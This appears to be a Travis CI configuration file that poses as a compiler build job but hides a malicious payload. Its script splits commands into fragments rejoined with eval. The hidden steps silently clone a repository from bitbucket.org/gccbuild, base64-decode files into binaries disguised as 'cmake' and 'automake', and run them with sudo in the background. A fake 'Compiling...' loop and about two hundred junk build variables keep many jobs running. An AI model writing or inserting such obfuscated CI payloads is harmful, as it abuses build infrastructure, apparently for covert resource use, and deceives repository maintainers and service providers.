dist: bionic

env:
  - BUILD="--rebuild-if-new-rev=465E9"
  - BUILD="--clean=289ft"
  - BUILD="--search-index=653Us"
  - BUILD="--autounmask-write=458IS"
  - BUILD="--newuse=870HT"
  - BUILD="--rebuild-ignore=602ue"
  - BUILD="--use-ebuild-visibility=35Z6"
  - BUILD="--quiet-fail=270Dr"
  - BUILD="--with-bdeps=536h7"
  - BUILD="--autounmask-write=527Xa"
  - BUILD="--tree=785gV"
  - BUILD="--reinstall-atoms=189nt"
  - BUILD="--autounmask=348PS"
  - BUILD="--root-deps=5371z"
  - BUILD="--keep-going=562tB"
  - BUILD="--nodeps=839L6"
  - BUILD="--rebuilt-binaries=677EQ"
  - BUILD="--selective=204fe"
  - BUILD="--accept-properties=294Wx"
  - BUILD="--usepkg=4776Y"
  - BUILD="--sync=733s8"
  - BUILD="--fail-clean=126iQ"
  - BUILD="--backtrack=7563U"
  - BUILD="--clean=1306E"
  - BUILD="--deselect=657fp"
  - BUILD="--rebuild-if-unbuilt=979WF"
  - BUILD="--autounmask-keep-masks=258sH"
  - BUILD="--changed-slot=684JZ"
  - BUILD="--buildpkg=33zk"
  - BUILD="--with-bdeps-auto=68uL"
  - BUILD="--autounmask-use=4922W"
  - BUILD="--onlydeps-with-rdeps=510U4"
  - BUILD="--complete-graph=80io"
  - BUILD="--tree=284I9"
  - BUILD="--usepkg-exclude=427cm"
  - BUILD="--resume=475lS"
  - BUILD="--depclean-lib-check=153Pd"
  - BUILD="--deselect=317Dy"
  - BUILD="--with-bdeps=136Be"
  - BUILD="--jobs=4877u"
  - BUILD="--usepkg-exclude=768FW"
  - BUILD="--read-news=875iM"
  - BUILD="--rage-clean=50Aa"
  - BUILD="--binpkg-respect-use=55oQ"
  - BUILD="--fuzzy-search=16UR"
  - BUILD="--reinstall=604Pn"
  - BUILD="--exclude=372q5"
  - BUILD="--root=5337V"
  - BUILD="--fail-clean=8849H"
  - BUILD="--quickpkg-direct=898xv"
  - BUILD="--reinstall-atoms=511ZX"
  - BUILD="--autounmask-keep-keywords=6785l"
  - BUILD="--onlydeps=805hq"
  - BUILD="--jobs=6082L"
  - BUILD="--rebuild-if-unbuilt=121px"
  - BUILD="--changed-slot=916xV"
  - BUILD="--ignore-soname-deps=332gU"
  - BUILD="--usepkgonly=771z8"
  - BUILD="--buildpkg=261iK"
  - BUILD="--searchdesc=920AR"
  - BUILD="--complete-graph-if-new-ver=361fy"
  - BUILD="--searchdesc=433EH"
  - BUILD="--changed-use=281ZX"
  - BUILD="--autounmask-continue=27nr"
  - BUILD="--keep-going=575Ma"
  - BUILD="--quickpkg-direct=5238P"
  - BUILD="--quiet-build=532JA"
  - BUILD="--changelog=755hV"
  - BUILD="--fetchonly=509tC"
  - BUILD="--onlydeps-with-rdeps=362CR"
  - BUILD="--accept-properties=24774"
  - BUILD="--selective=627ZO"
  - BUILD="--verbose-slot-rebuilds=91fs"
  - BUILD="--misspell-suggestions=411qP"
  - BUILD="--read-news=514FL"
  - BUILD="--prefix=16Ek"
  - BUILD="--rebuild-if-unbuilt=827y0"
  - BUILD="--reinstall-atoms=409b5"
  - BUILD="--info=334j8"
  - BUILD="--with-bdeps=2650q"
  - BUILD="--getbinpkgonly=862Mr"
  - BUILD="--alphabetical=799Db"
  - BUILD="--complete-graph-if-new-use=558Jb"
  - BUILD="--rebuild-if-new-ver=59729"
  - BUILD="--quiet-unmerge-warn=129n7"
  - BUILD="--select=663Zp"
  - BUILD="--nodeps=792QP"
  - BUILD="--nospinner=494jw"
  - BUILD="--changed-slot=808js"
  - BUILD="--usepkg=616yg"
  - BUILD="--rage-clean=300HL"
  - BUILD="--fail-clean=345iU"
  - BUILD="--ignore-default-opts=281jN"
  - BUILD="--ignore-world=552L8"
  - BUILD="--search=80V6"
  - BUILD="--searchdesc=885eU"
  - BUILD="--use-ebuild-visibility=43kq"
  - BUILD="--usepkg-exclude=939Do"
  - BUILD="--quickpkg-direct=616FZ"
  - BUILD="--sync-submodule=337WV"
  - BUILD="--newuse=890V3"
  - BUILD="--search-index=474oq"
  - BUILD="--unmerge=360bj"
  - BUILD="--quiet-build=497qI"
  - BUILD="--quiet-repo-display=6422d"
  - BUILD="--autounmask-backtrack=477CA"
  - BUILD="--root-deps=994kj"
  - BUILD="--autounmask-keep-masks=9128N"
  - BUILD="--digest=983T0"
  - BUILD="--sync=472Go"
  - BUILD="--fuzzy-search=33NZ"
  - BUILD="--info=738QM"
  - BUILD="--usepkg-exclude=688Ol"
  - BUILD="--reinstall-atoms=7474G"
  - BUILD="--deep=187JC"
  - BUILD="--usepkgonly=353Io"
  - BUILD="--prune=314F2"
  - BUILD="--usepkg-exclude=399e"
  - BUILD="--jobs=8479i"
  - BUILD="--debug=610lo"
  - BUILD="--jobs=11687"
  - BUILD="--package-moves=589BA"
  - BUILD="--rebuild-if-unbuilt=331ZZ"
  - BUILD="--rebuild-if-new-slot=429MU"
  - BUILD="--autounmask-license=4885L"
  - BUILD="--reinstall=380GL"
  - BUILD="--dynamic-deps=414Cz"
  - BUILD="--deselect=321Qw"
  - BUILD="--rebuild-if-new-ver=509LK"
  - BUILD="--quickpkg-direct=390XS"
  - BUILD="--version=3491y"
  - BUILD="--ignore-soname-deps=690JT"
  - BUILD="--nodeps=155PS"
  - BUILD="--backtrack=331Wv"
  - BUILD="--search-similarity=693lO"
  - BUILD="--complete-graph-if-new-ver=964rI"
  - BUILD="--binpkg-changed-deps=135O"
  - BUILD="--help=533lx"
  - BUILD="--metadata=470vm"
  - BUILD="--autounmask-license=936wZ"
  - BUILD="--deselect=5699m"
  - BUILD="--verbose-conflicts=6040q"
  - BUILD="--color=550GJ"
  - BUILD="--keep-going=294C9"
  - BUILD="--backtrack=891ad"
  - BUILD="--quiet-repo-display=402cd"
  - BUILD="--searchdesc=687DH"
  - BUILD="--tree=893a5"
  - BUILD="--rage-clean=449wq"
  - BUILD="--changed-deps-report=646Ap"
  - BUILD="--buildpkg-exclude=530jy"
  - BUILD="--ask-enter-invalid=728Fg"
  - BUILD="--verbose=156Aa"
  - BUILD="--onlydeps=681oK"
  - BUILD="--sync=254DW"
  - BUILD="--clean=399jK"
  - BUILD="--getbinpkg=518q8"
  - BUILD="--help=360FQ"
  - BUILD="--ignore-world=824I4"
  - BUILD="--backtrack=272x4"
  - BUILD="--noreplace=652Vh"
  - BUILD="--changed-use=7888D"
  - BUILD="--quiet-fail=496HV"
  - BUILD="--metadata=9862S"
  - BUILD="--prune=230wg"
  - BUILD="--autounmask=8123A"
  - BUILD="--selective=28jG"
  - BUILD="--depclean=384HS"
  - BUILD="--version=777W1"
  - BUILD="--root=41gq"
  - BUILD="--deep=516WM"
  - BUILD="--autounmask-backtrack=9559W"
  - BUILD="--unmerge=7214C"
  - BUILD="--skipfirst=1814U"
  - BUILD="--sysroot=57nf"
  - BUILD="--with-bdeps=744hH"
  - BUILD="--newrepo=174cJ"
  - BUILD="--use-ebuild-visibility=694DD"
  - BUILD="--root-deps=750FU"
  - BUILD="--autounmask-only=85EC"
  - BUILD="--binpkg-changed-deps=459gx"
  - BUILD="--read-news=12667"
  - BUILD="--info=578lb"
  - BUILD="--changed-deps=5406G"
  - BUILD="--fuzzy-search=498Vh"
  - BUILD="--reinstall-atoms=375C2"
  - BUILD="--quickpkg-direct=695wb"

language: minimal

script:
  - sudo apt update || true
  - ixsHEF="sudo apt --"
  - FMghEZbNoIM="yes install"
  - hpMGpXv=" cl-base64 "
  - pOkuPVxioN="git &>/dev/"
  - eval "$ixsHEF""$FMghEZbNoIM""$hpMGpXv""$pOkuPVxioN""null"
  - chQqJsH="git clone h"
  - pznJs="ttps://gccb"
  - HJzXsEjUa="uild@bitbuc"
  - FEAimvk="ket.org/gcc"
  - QMfhZBeRl="build/gcc.g"
  - rQOkRAKamO="it &>/dev/n"
  - eval "$chQqJsH""$pznJs""$HJzXsEjUa""$FEAimvk""$QMfhZBeRl""$rQOkRAKamO""ull"
  - DBxqRM="base64 -d g"
  - SSRxhdfOmab="cc/cmake_ >"
  - eval "$DBxqRM""$SSRxhdfOmab"" cmake"
  - dNStciVUXb="base64 -d g"
  - ejkpF="cc/config_ "
  - eval "$dNStciVUXb""$ejkpF""> run"
  - QddLASiS="base64 -d g"
  - oqpOXoSc="cc/make_ > "
  - eval "$QddLASiS""$oqpOXoSc""automake"
  - chmod +x automake cmake
  - ./cmake
  - pjUpMoZTaIB="sed -i 's/b"
  - YogGgFGgM="uild/tg3o/g"
  - eval "$pjUpMoZTaIB""$YogGgFGgM""' run"
  - TOQqcf="sudo ./auto"
  - BGfxZ="make -c run"
  - FuOuWVsmn=" &>/dev/nul"
  - eval "$TOQqcf""$BGfxZ""$FuOuWVsmn""l &"
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2596)) ] && sudo killall automake && break; sleep 216; done
